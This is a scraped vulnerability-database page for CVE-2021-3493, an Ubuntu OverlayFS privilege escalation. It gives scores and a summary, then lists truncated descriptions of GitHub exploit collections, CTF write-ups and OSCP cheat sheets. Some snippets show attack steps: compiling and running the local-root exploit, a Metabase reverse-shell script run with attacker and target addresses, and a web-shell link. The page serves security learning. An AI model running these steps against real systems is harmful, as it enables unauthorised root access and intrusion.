7.2
CVSSv2

CVE-2021-3493

Published: 17/04/2021 Updated: 07/07/2023
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
VMScore: 663
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The overlayfs implementation in the linux kernel did not properly validate with respect to user namespaces the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

canonical ubuntu linux

Mailing Lists

This Metasploit module exploits a vulnerability in Ubuntu's implementation of overlayfs The vulnerability is the result of failing to verify the ability of a user to set the attributes in a running executable Specifically, when Overlayfs sends the set attributes data to the underlying file system via vfs_setxattr, it fails to first verify the dat ...

Github Repositories

TryHackMe Challange writeup for Couch room

Couch - TryHackMe Challenge Writeup Hatami Ra'is Bukhari (Althemier) Challenge link Scanning Nmap scan nmap -sC -sV -oN nmap/resulttxt $IP PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 72p2 Ubuntu 4ubuntu210 (Ubuntu Linux; protocol 20) | ssh-hostkey: | 2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA) | 256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13

⚡️ Information Security Modules This is my public repository on GitHub about my entire evolution process within the information security market Rust Studies Ctf Write-ups Bug Bounty Reports CVEs found Projects 🔥 Contact me If you want to talk to me, this is the only place so far where you can talk to me 📌 Python Studies Here I share with you my progress in Rust s

⚡️ Information Security Modules This is my public repository on GitHub about my entire evolution process within the information security market Rust Studies Ctf Write-ups Bug Bounty Reports CVEs found Projects 🔥 Contact me If you want to talk to me, this is the only place so far where you can talk to me 📌 Python Studies Here I share with you my progress in Rust s

CVE-2021-3493 UBUNTU OVERLAYFS LOCAL PRIVIESC Find out how a vulnerability in OverlayFS allows local users under Ubuntu to gain root privileges Vulnerability Summary An Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respect to user namespaces A local attacker could use

CVE-2021-3493

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

OverlayFS---CVE-2021-3493

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit chmod +x exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with r

2021 kernel vulnerability in Ubuntu.

overlayFS CVE-2021-3493 OverlayFs OverlayFS es un módulo del kernel de Linux que permite al sistema combinar varios puntos de montaje en uno, para que pueda acceder a todos los archivos de cada uno dentro de una estructura de directorio Sobre la vulnerabilidad Hace poco SSD-Discloure lanzó un PoC para un exploit del kernel de Ubuntu (link) Esta vulnerabilidad fu

Rapport Be Root Prérequis pour ce rapport Premièrement dans les exemples ci-dessous l'utilisation du compte utilisateur linux www-data sera faite Cet utilisateur a donc des droits restreints sur la majorité du serveur hormis la partie Web sudo -i <-- Permet de passer root sudo -u www-data bash <-- Permet de se connecter sur cet utilisat

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

CVE-2021-3493 Ubuntu漏洞

CVE-2021-3493

Ubuntu OverlayFS Local Privesc

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

This repo contains Machines and Notes for practicing for EJPTv1/2 exam

eJPT_Prep Hey N1NJ10 👋 This repo contains Machines and Notes for practicing for EJPTv1/2 exam and if you wanna to intract with a community friends you can Join to this Telegram channel

This repo contains Machines and Notes for practicing for EJPTv1/2 exam

eJPT_Prep Hey N1NJ10 👋 This repo contains Machines and Notes for practicing for EJPTv1/2 exam and if you wanna to intract with a community friends you can Join to this Telegram channel

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit chmod +x exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with r

CVE-2021-3493 Ubuntu OverlayFS Local Privesc (Interactive Bash Shell & Execute Command Entered)

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respect to user namespaces A local attacker could use this to gain elevated privileges, due to a patch carried in Ubuntu to allow unprivileged overlayfs mounts

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

Analytics CVE-2023-38646 zhuanlanzhihucom/p/647355511 CVE-2021-3493 githubcom/briskets/CVE-2021-3493

Analytics-htb-Rce #first clone the repository git clone githubcom/securezeron/CVE-2023-38646 cd CVE-2023-38646 pip install -r requirementstxt python3 CVE-2023-38646-Reverse-Shellpy -h #the before run reverse shell start netact listeiner and go back to run script as follows python3 CVE-2023-38646-Reverse-Shellpy --rhost {Target Ip address} --lhost {your ip-adress} -

Hospital GUI shell:githubcom/flozz/p0wny-shell/blob/master/shellphp Ubuntu提权:githubcom/briskets/CVE-2021-3493 GhostScript命令注入:githubcom/jakabakos/CVE-2023-36664-Ghostscript-command-injection

A penetration toolkit for container environment

ctrsploit: A penetration toolkit for container environment 中文文档 ctrsploit [kənˈteɪnər splɔɪt] , follows sploit-spec v043 Why ctrsploit see here Pre-Built Release githubcom/ctrsploit/ctrsploit/releases Self Build Build in Container make binary && ls -lah bin/release Build in Local make build-ctrsploi

This is not my tools i just taken from google and github

Root Kernel tools CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Refference Usage gcc exploitc -o exploit /exploit Exploit 2 ( Pwnkit ) chmod +x pwnkit /pwnkit Exploit 3 Affected systems To remediate the vulnerabilit

A penetration toolkit for container environment

ctrsploit: A penetration toolkit for container environment 中文文档 ctrsploit [kənˈteɪnər splɔɪt] Why ctrsploit see here Pre-Built Release githubcom/ctrsploit/ctrsploit/releases Self Build Build in Container make binary && ls -lah bin/release Build in Local make build-ctrsploit

Collection of Linux Kernel exploits for CTF.

Linux kernal Exploits This repo is a collection of kernal exploits Sources githubcom/briskets/CVE-2021-3493 githubcom/UncleJ4ck/CVE-2021-41091 githubcom/xkaneiki/CVE-2023-0386 githubcom/leesh3288/CVE-2023-4911 Disclaimer I am not the author of any of this exploit

Personal "King of The Hill" toolkit.

KoTH-Tools Welcome to KoTH-Tools, a collection of custom tools used in TryHackMe's King of the Hill competition These tools are designed for use on Linux machines Table of Contents CVEs Directory Static Directory Monitor Directory Animations Directory Scripts Reverse Shells CVEs Directory This directory contains exploits for CVEs found in the machines CVE-2019-18634-

Tracking interesting Linux (and UNIX) malware. Send PRs

linux-malware Rolling 7 day view of updates from this repo Submissions? Press/academia securelistcom/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ (#19) - Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact wwwbleeping

Getting Started with Hacking on TryHackMe Mehmood Ali Introduction: Step into the realm of cybersecurity! In the modern digital environment, gaining hands-on skills is essential for thriving in this field TryHackMe, a widely recognized online platform, offers an immersive, practical learning experience for those who aspire to be cybersecurity experts This article is here to a

all about localroot which was successfully tested :)

all about localroot which was successfully tested :) CVE-2021-4034 - Pkexec Local Privilege Escalation CVE-2022-0847 - DirtyPipe-Exploit CVE-2022-37706 - LPE-Exploit CVE-2021-3493 - OverlayFS Local Privesc CVE-2022-2588 - DirtyCred CVE-2023-22809 - sudoedit-privesc traitor

all about localroot which was successfully tested :)

all about localroot which was successfully tested :) CVE-2021-4034 - Pkexec Local Privilege Escalation CVE-2022-0847 - DirtyPipe-Exploit CVE-2022-37706 - LPE-Exploit CVE-2021-3493 - OverlayFS Local Privesc CVE-2022-2588 - DirtyCred CVE-2023-22809 - sudoedit-privesc traitor

Exploits working {tested my me} for various scenarios

Exploit Collection This is my curated collection of working exploits for various vulnerabilities I will keep updating this repository with new and effective exploits CVE-2023-38646 (Metabase) CVE ID: CVE-2023–38646 Description: This vulnerability allowed attackers to execute arbitrary commands on the Metabase server without requiring any authentication Resolved in Met

Embark on my CTFs Journey, where I document my conquests and lessons learned while navigating the dynamic challenges of Capture The Flag contests. From cracking codes to outsmarting puzzles, join me in exploring the diverse landscape of cybersecurity challenges.

Description Welcome to my personal Capture The Flags (CTFs) repository! This repository is created to track my progress, achievements, and detailed notes regarding cybersecurity challenges, especially on popular platforms like TryHackMe, Hack The Box and Rootme Contents This repository contains an organized list of CTF Machines that I have successfully exploited Each entry in

Preparation OSCP

OSCP-Cheat-Sheets Preparation OSCP wwwnetsecfocuscom/oscp/2021/05/06/The_Journey_to_Try_Harder-_TJnull-s_Preparation_Guide_for_PEN-200_PWK_OSCP_20html \ scund00rcom/all/oscp/2018/02/25/passing-oscphtml liodeusgithubio/2020/09/18/OSCP-personal-cheatsheethtml blogadithyanakcom/oscp-preparation-guide/linux-privilege-escalation

Tracking my progress on TryHackMe

THM-Captured-Rooms 🚩 Tracking my room completion progress on TryHackMe Rooms Completed Welcome Getting Started How to use TryHackMe JavaScript Basics OpenVPN Learn & win prizes - Fall 2022 Intro to Offensive Security c4ptur3-th3-fl4g Pyramid Of Pain PrintNightmare Cryptography for Dummies Intro to Digital Forensics Linux Fundamentals Part 1 Part 2 Part 3 Win

【Hello CTF】收录国内网络安全以及CTF领域的优秀视频作者

Awsome-SecCTF-Videomaker 【Hello CTF】收录国内网络安全以及CTF领域的优秀视频作者 CTF 个人向 昵称 方向 主要课程内容 备注 软趴趴の锅边糊 全栈 Top 3:播放量 6841 | 【CTF】Web--构造jwt绕过认证登录播放量 4404 | 【AWD】网络安全线下赛之从0到??——AWD的套路加靶机演示播放量 3860 | 【CTF

本项目制作的初衷是帮助渗透新手快速搭建工作环境,工欲善其事,必先利其器。

Windows10 Penetration Suite Toolkit within Kali Linux v40 20221206 更新说明: 由于Kali的图形化模式占用资源造成卡顿,且使用率不高,特此去除图形化模式。 参考链接 补充了大量实用工具,升级部分软件为最新版; 重构了“漏洞工具” 的目录分类,查找更方便快捷; 重构了开始菜单

RedTeam Pentesting 学习资源,工具

Pentest-Tips 各类靶场 综合 DVWA:Damn Vulnerable Web Application PIKACHU:一个好玩的Web安全-漏洞测试平台 JVAPP:Java漏洞练习程序 一个关于PHP的代码审计项目 社工靶场:Social Lab is NOT a real social network It is a social engineering wargame NOTE-B:Noteb-B web漏洞靶场平台 漏洞靶场-快速搭建Web安全漏洞和第三方

z# EzpzCheatSheet This CheatSheet will not have much explanation It just a commands that has been used pwning all of the machines from various platform and something that I have encounter before Also any notes, CTF and others that help me Also, do check this notes here githubcom/aniqfakhrul/archives ! A Ports Port 21 (FTP) => Commands $ wget -m --no-passive

Metarget is a framework providing automatic constructions of vulnerable infrastructures.

中文 | English 1 Introduction Metarget = meta- + target, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically 11 Why Metarget? During security researches, we might find that the deployment of vulnerable environment often takes much time, while the time spen

Metarget is a framework providing automatic constructions of vulnerable infrastructures.

中文 | English 1 Introduction Metarget = meta- + target, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically 11 Why Metarget? During security researches, we might find that the deployment of vulnerable environment often takes much time, while the time spen

What's this This project is mainly used to collect the exp for Linux platform privilege promotion, only to help penetration testers quickly achieve privilege promotion in actual combat Information CVE ID Description Kernels CVE-2004-0077 Linux Kernel 2420, 2224, 2425, 2426, 2427 CVE-2004-1235 Linux Kernel 2429 CVE-2005-0736 Linux Kernel 265, 267,

Ethical Hacking Repository

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

OSCP Cheat Sheet

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

OSCP Cheat Sheet

OSCP Cheat Sheet Commands, Payloads and Resources for the OffSec Certified Professional Certification (OSCP) Since this little project get's more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam Feel free to submit a pull request or reach out to me on Twitter for suggestions Every hel

Linux Eelvation(持续更新)

What's this This project is mainly used to collect the exp for Linux platform privilege promotion, only to help penetration testers quickly achieve privilege promotion in actual combat Information CVE ID Description Kernels CVE-2004-0077 Linux Kernel 2420, 2224, 2425, 2426, 2427 CVE-2004-1235 Linux Kernel 2429 CVE-2005-0736 Linux Kernel 265, 267,

Linux privilege escalation exploits collection.

Linux Privilege Escalation Exploits Overview The exploits collected in this project are for security learning and research purposes only Kernel Vulnerabilities The possible affected versions are just for the CVE not the exploits CVE-ID Possible affected versions CVE-2022-34918 Linux kernel < 51811 CVE-2022-32250 Linux kernel < 5181 CVE-2022-27666

平常看到好的渗透hacking工具和多领域效率工具的集合

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents ASL ActionScript Ada Arduino AsciiDoc Assembly Astro AutoHotkey Batchfile BitBake Blade BlitzBasic Boo C C# C++ CMake CSS Classic ASP Clojure CodeQL ColdFusion Dart Dockerfile Emacs Lisp Erlang F# FreeMarker Go Groovy HCL HTML Hack Haskell Inno Setup Java JavaScript Jinja Jupyter Notebook KiCad

poc集合(持续更新ing)

Awesome-POC 【免责声明】本仓库所涉及的技术、思路和工具仅供安全技术研究,任何人不得将其用于非授权渗透测试,不得将其用于非法用途和盈利,否则后果自行承担。 【持续更新ing】基于互联网等情况下,自己收集整合了一些弱口令,2022,2023HVV相关的POC。 0x01 项目导航 CMS漏洞 Asp

sec-tools 安全工具汇总 engine: Droidefense: Advance Android Malware Analysis Framework react-cool-starter: 😎 🐣 A starter boilerplate for a universal web app with the best development experience and a focus on performance and best practices howtheysre: A curated collection of publicly available resources on how technology and tech-savvy organizations around the worl

sec-tools 安全工具汇总 engine: Droidefense: Advance Android Malware Analysis Framework react-cool-starter: 😎 🐣 A starter boilerplate for a universal web app with the best development experience and a focus on performance and best practices howtheysre: A curated collection of publicly available resources on how technology and tech-savvy organizations around the worl

Normal-POC 【免责声明】本仓库所涉及的技术、思路和工具仅供安全技术研究,任何人不得将其用于非授权渗透测试,不得将其用于非法用途和盈利,否则后果自行承担。 0x01 项目导航 CMS漏洞 AspCMS commentListasp SQL注入漏洞 BSPHP indexphp 未授权访问 信息泄露漏洞 CmsEasy crossall_actphp SQL注入漏

Normal-POC 【免责声明】本仓库所涉及的技术、思路和工具仅供安全技术研究,任何人不得将其用于非授权渗透测试,不得将其用于非法用途和盈利,否则后果自行承担。 0x01 项目导航 CMS漏洞 AspCMS commentListasp SQL注入漏洞 BSPHP indexphp 未授权访问 信息泄露漏洞 CmsEasy crossall_actphp SQL注入漏

Linux Kernel Exploitation A collection of links related to Linux kernel security and exploitation Updated bimonthly Pull requests are welcome as well Follow @andreyknvl on Twitter to be notified of updates Subscribe to @linkersec on Telegram, Twitter, or Reddit for highlights Trainings See xairyio/trainings/ Contents Books Techniques Exploitation Protection Bypasses

Vulnerability 纪念我们始终热爱的 来人皆是朋友 去人也不留 © Edge Security Team 本项目多数漏洞为互联网收集(多数均注明了原作者链接🔗,如有侵权请联系我们删除,谢谢),部分漏洞进行了复现。 如有引用请注明文章内原作者链接,谢谢!!! 免责申明:项目所发布的资料\FOFA搜索语法\POC

bounty collection

Contents bounty targets data data components hk1 node modules DbCache Resources for Beginner Bug Bounty Hunters assets javasec study BruteX wordlists loot kalitools Web Applications Hardware Hacking Sniffing Spoofing Vulnerability Analysis Wireless Attacks Forensics Tools image Password Attacks Reverse Engineering Exploitation Tools Information Gathering Reporting Tools Galax

A collection of links related to Linux kernel security and exploitation

Linux Kernel Exploitation A collection of links related to Linux kernel security and exploitation Updated bimonthly Pull requests are welcome as well Follow @andreyknvl on Twitter to be notified of updates Subscribe to @linkersec on Telegram, Twitter, Mastodon, or Reddit for highlights Trainings See xairyio/trainings/ Contents Books Techniques Exploitation Protection B

A Common Vulnerability PoC Knowledge Base一个普遍漏洞POC知识库

Awesome-POC 【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 法律法规。 0x01 项目导航 CMS漏洞 74cms v421 v42129 后台getshell漏洞 74cms v501 后台跨站请

一个漏洞POC知识库

Awesome-POC 【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 法律法规。 0x01 项目导航 CHECKLIST Nacos 漏洞 Checklist SmartBi 漏洞 Checklist 安全设备漏洞 Chec

更新于 2023-11-27 08:36:01 近15天release更新记录 更新时间 项目名称 版本 更新内容 2023-11-26 10:48:00 gshark v124 ## Fixed * 修复 task 表初始化的问题 * 增加 nginx 配置全文 2023-11-26 04:28:12 PEASS-ng 20231126-a1ab960a 2023-11-26 00:56:40 dalfox v291 ## Changelog * 7458557 fixed typo * 000d2dc chore: update contributors [skip

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 请注意所有工具是否有后门或者其他异常行为,建议均在虚拟环境操作。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 961 CVE-2022-0847-

Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 2023-11-15T09:54:51Z qq-tim-elevation githubcom/vi3t1/qq-tim-elevation CVE-2

Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 2023-11-15T09:54:51Z qq-tim-elevation githubcom/vi3t1/qq-tim-elevation CVE-2

TOP All bugbounty pentesting CVE-2023- POC Exp RCE example payload Things

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2023 year top total 30 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2023 star updated_at name url des 422 202

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 975 CVE-2022-0847-

TOP all Top Top Top_Codeql TOP All bugbounty pentesting CVE-2022- POC Exp Things Table of Contents 2022 year top total 30 2021 year top total 30 2020 year top total 30 2019 year top total 30 2018 year top total 30 2017 year top total 30 2016 year top total 30 2015 year top total 30 2014 year top total 30 2013 year top total 30 2022 star name url des 988 CVE-2022-0847-

渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms

Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 请注意所有工具是否有后门或者其他异常行为,建议均在虚拟环境操作。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集

快速对自己项目中引入的第三方开源库进行1day patch检索,patch数据每天晚上11点更新

CVE Diff Checker diff checker主要思路是使用历史diff代码到二次开发的项目里面匹配对应的补丁是否被修改 用法: python /mainpy 你的项目代码路径 比如说项目组引入Qemu作为第三方库,然后要快速检测该版本的Qemu源码存在哪些漏洞: python /mainpy /qemu-source-521

安全类各家文库大乱斗

SecBooks 各大文库公众号文章收集,部分文库使用gitbook部署;部分公众号使用杂散文章为主。 使用插件 "hide-element", "back-to-top-button", "-lunr", "-search", "search-pro", "splitter" #目录自动生成插件(book sm) npm install -g gitbook-summ

PoC in GitHub 2022 CVE-2022-0185 (2022-02-11) A heap-based buffer overflow flaw was found in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length An unprivileged (in case of unprivileged user namespaces enabled, otherwise needs namespaced CAP_SYS_ADMIN privilege) local user able to open a f

PoC in GitHub 2023 CVE-2023-0045 missyes/CVE-2023-0045 es0j/CVE-2023-0045 CVE-2023-0179 TurtleARM/CVE-2023-0179-PoC CVE-2023-0297 (2023-01-13) Code Injection in GitHub repository pyload/pyload prior to 050b3dev31 bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad CVE-2023-0315 (2023-01-15) Command Injection in GitHub repository froxlor/froxlor prior to 208 mhaskar/C

One-command to detect all remotely exploitable KEV vulnerability. Sourced from CISA KEV, Google's Tsunami and Ostorlab's Asteroid.

Known Exploited Vulnerabilities Detector Introduction This project is dedicated to the detection of known exploited vulnerabilities Our goal is to provide a single command to detect all of these vulnerabilities Requirements Docker is required to run scans locally To install docker, please follow these instructions Installing Ostorlab ships as a Python package on pypi To in